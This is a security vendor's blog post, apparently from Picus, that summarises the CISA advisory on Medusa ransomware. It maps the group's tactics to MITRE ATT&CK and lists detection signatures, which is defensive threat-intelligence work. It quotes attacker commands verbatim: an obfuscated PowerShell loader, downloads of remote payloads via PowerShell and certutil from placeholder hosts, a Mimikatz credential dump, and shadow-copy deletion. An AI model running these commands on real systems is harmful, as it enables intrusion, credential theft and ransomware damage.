Medusa Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA25-071A
On March 12, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Medusa ransomware [1]. Medusa ransomware emerged as Ransomware-as-a-Service in June 2021 and gained infamy by compromising over 300 victims from critical infrastructure sectors, including healthcare, insurance, technology, manufacturing, legal, and technology.
In this blog post, we explain the Tactics, Techniques, and Procedures (TTPs) used by Medusa ransomware and how organizations can defend themselves against Medusa ransomware attacks.
Medusa Ransomware-as-a-Service Group
Medusa is a ransomware-as-a-service (RaaS) group that has been active since June 2021. Initially, Medusa operated as a closed ransomware variant controlled by a single group, but it later evolved into an affiliate-based model. Despite this shift, the core Medusa developers still retain control over important operations like ransom negotiations. Medusa threat actors employ a double extortion strategy, where they encrypt victim data and threaten to release it publicly unless the ransom is paid.
The group primarily targets organizations across various critical infrastructure sectors, including healthcare, insurance, technology, manufacturing, legal, and technology. Their victims range from large enterprises to smaller businesses, demonstrating a broad and opportunistic targeting approach.
Medusa's motivations are primarily financial. Their ransom demands vary widely, with some victims required to pay millions of dollars to regain access to their data. They also engage in direct negotiation tactics, contacting victims via phone or email to increase pressure. Additionally, Medusa actors operate a data leak site where they auction stolen data to third parties before the ransom deadline expires. In some cases, victims who pay the ransom have been targeted again with further extortion attempts, suggesting that Medusa actors may engage in triple extortion tactics.
The group's modus operandi involves infiltrating a network, identifying valuable data, and deploying ransomware to encrypt files. Medusa affiliates gain initial access through multiple techniques, often relying on initial access brokers (IABs) who sell access to compromised networks. These brokers use phishing campaigns to steal credentials and exploit unpatched software vulnerabilities. Known exploits include vulnerabilities in remote access tools such as ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet EMS (CVE-2023-48788). Once inside, the attackers use living-off-the-land binaries (LoLBin) and legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for network discovery and lateral movement. They use living-off-the-land (LOTL) techniques to evade detection, leveraging built-in Windows tools like PowerShell and Windows Management Instrumentation (WMI). They also attempt to disable security software using bring-your-own-vulnerable-driver (BYOVD) techniques. Exfiltrated data is stored on Medusa-controlled servers and is used to pressure victims to pay the demanded ransom.
Medusa Ransomware Analysis and MITRE ATT&CK TTPs
Initial Access
T1190 Exploit Public Facing Applications
Medusa threat actors exploit unpatched software vulnerabilities to gain initial access to target environments. Organizations are advised to apply patches promptly to mitigate this risk.
Affected Product |
Vulnerability |
CVSS Score |
ConnectWise ScreenConnect |
CVE-2024-1709 |
10.0 (Critical) |
Fortinet EMS |
CVE-2023-48788 |
9.8 (Critical) |
T1566 Phishing
Medusa affiliates frequently use phishing campaigns to steal user credentials and gain access to target environments. These campaigns often involve deceptive emails with malicious attachments or links leading to credential-harvesting websites.
Execution
T1059.001 Command and Scripting Interpreter: PowerShell
Medusa threat actors use PowerShell command given below to execute malicious scripts and establish persistence. This command also runs an obfuscated payload in memory to avoid detection.
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('<base64_payload>'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) |
T1059.003 Command and Scripting Interpreter: Windows Command Shell
Medusa threat actors utilize the Windows Command Shell (cmd.exe) to execute malicious commands, perform reconnaissance, disable security defenses, and deploy ransomware across victim networks.
cmd.exe /c net share |
T1047 Windows Management Instrumentation
Medusa actors abuse WMI to gather information about system processes, users, and network configurations. The command below extracts printer configurations, which can be useful for identifying networked devices.
wmic printer get caption,name,deviceid,drivername,portname wmic printjob |
Persistence
T1136.002 Create Account
Medusa actors create new user accounts to maintain persistence. The command below creates a new user account with administrative privileges.
net user /add default <password> /domain |
Defense Evasion
T1070.003 Indicator Removal: Clear Command History
To avoid detection, Medusa actors delete traces of their activities by erasing PowerShell command line history. The command below deletes the PowerShell command history file, making forensic investigations more difficult.
powershell Remove-Item (Get-PSReadlineOption).HistorySavePath |
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
Medusa actors obfuscate scripts and payloads to evade detection by security tools. They manipulate PowerShell and batch scripts to hide malicious commands. This technique splits and concatenates a command to bypass signature-based detection.
powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<malicious_file>.msi) |
T1562.001 Impair Defenses: Disable or Modify Tools
Medusa threat actors also modify firewall rules to allow inbound RDP connections.
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow |
Discovery
T1046 Network Service Discovery & T1016 System Network Configuration Discovery
Medusa threat actors use legitimate administrative tools to identify active hosts, open ports, and services running on the victim's network. They also use network scanning tools like Advanced IP Scanner and SoftPerfect Network Scanner to map the internal network. The command below retrieves detailed network configuration, including IP addresses, gateway settings, and DNS servers.
netstat -a |
T1135 Network Share Discovery
Medusa actors identify shared network drives to spread ransomware and steal data. The command below lists available network shares on a remote system.
net share |
T1082 System Information Discovery
Medusa actors collect system details such as OS version, installed software, and system architecture. The command below gathers detailed system information to tailor attacks.
systeminfo echo Computer: %COMPUTERNAME% echo Username: %USERNAME% echo Domain: %USERDOMAIN% echo Logon Server: %LOGONSERVER% echo DNS Domain: %USERDNSDOMAIN% echo User Profile: %USERPROFILE% echo System Root: %SYSTEMROOT% driverquery |
T1069.002 Permission Groups Discovery: Domain Groups
Medusa actors enumerate Active Directory domain groups to identify privileged accounts. The command below lists members of the Domain Admins group, which can be targeted for privilege escalation.
net group "Domain Admins" /domain |
Credential Access
T1003.001 OS Credential Dumping: LSASS Memory
Medusa affiliates use Mimikatz to dump credentials from the Local Security Authority Subsystem Service (LSASS), allowing them to escalate privileges and move laterally within the network. The command below extracts plaintext passwords and NTLM hashes from LSASS memory.
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" |
Lateral Movement
T1072 Software Deployment Tools
Medusa threat actors use software deployment tools like PDQ Deploy and BigFix to distribute ransomware across networks.
T1021.001 Remote Services: Remote Desktop Protocol
Medusa threat actors use compromised credentials to access systems via RDP, enabling them to move laterally within the victim's network.
mstsc.exe /v:{hostname/ip} /u:{user} /p:{password} |
Exfiltration
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Medusa threat actors used rclone to exfiltrate their victims' sensitive data to the Medusa C2 servers.
Command and Control
T1071.001 Application Layer Protocol: Web Protocols
Medusa threat actors use HTTPS to communicate with command-and-control (C2) servers and exfiltrate data.
T1219 Remote Access Software
Medusa threat actors use legitimate remote access tools like AnyDesk to maintain control over compromised systems.
T1105 Ingress Tool Transfer
Medusa threat actors transfer malicious tools and payloads into victim environments to facilitate their operations, including credential dumping, remote access, and ransomware deployment. They often use certutil, PowerShell, and PsExec to download and execute tools while evading security controls.
certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll |
Impact
T1486 Data Encrypted for Impact
Medusa ransomware encrypts victim data using AES-256 encryption and appends the .medusa extension to affected files. The encryptor process, gaze.exe, is deployed to encrypt files and drop ransom notes.
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c "c:\gaze.exe" |
T1490 Inhibit System Recovery
Medusa threat actors delete volume shadow copies to prevent recovery.
vssadmin delete shadows /all /quiet |
How Picus Helps Simulate Medusa Ransomware Attacks?
We also strongly suggest simulating Medusa ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as HellCat, Ghost, and Black Basta, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Medusa ransomware:
Threat ID |
Threat Name |
Attack Module |
31340 |
Medusa Ransomware Campaign |
Windows Endpoint |
72791 |
Medusa Ransomware Download Threat |
Network Infiltration |
66692 |
Medusa Ransomware Email Threat |
Email Infiltration (Phishing) |
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Medusa ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Medusa ransomware:
Security Control |
Signature ID |
Signature Name |
Check Point NGFW |
0920BA626 |
Ransomware.Win32.Medusa.TC.5a8fkYQw |
0F31EFFFA |
Ransomware.Win32.Medusa.TC.de3cwwcz |
|
0B7282E76 |
Trojan.Win32.Imps.TC.bfb4UCRQ |
|
090BB1A2E |
Ransomware.Win32.Medusa.TC.b20eAyZa |
|
0808FEF5A |
Ransomware.Win32.Medusa.TC.2d62ZwaZ |
|
Cisco FirePower |
1.49569.1 |
MALWARE-OTHER PowerShell invocation with ExecutionPolicy Bypass attempt |
Forcepoint NGFW |
|
File_Malware-Blocked |
Fortigate AV |
10126105 |
W32/Filecoder.MEDU!tr.ransom |
Fortigate AV |
10127337 |
W32/Filecoder_Medusa.A!tr.ransom |
Palo Alto |
624270429 |
Ransom/Win32.medusa.h |
572533496 |
ransomware/Win32.rents.u |
|
624270495 |
Ransom/Win32.medusa.j |
|
609797718 |
ransomware/Win32.medusa.g |
|
624270456 |
Ransom/Win32.medusa.i |
|
Trellix |
0x4840c900 |
MALWARE: Malicious File Detected by GTI |
Snort |
1.49569.1 |
MALWARE-OTHER PowerShell invocation with ExecutionPolicy Bypass attempt |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] "#StopRansomware: Medusa Ransomware," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a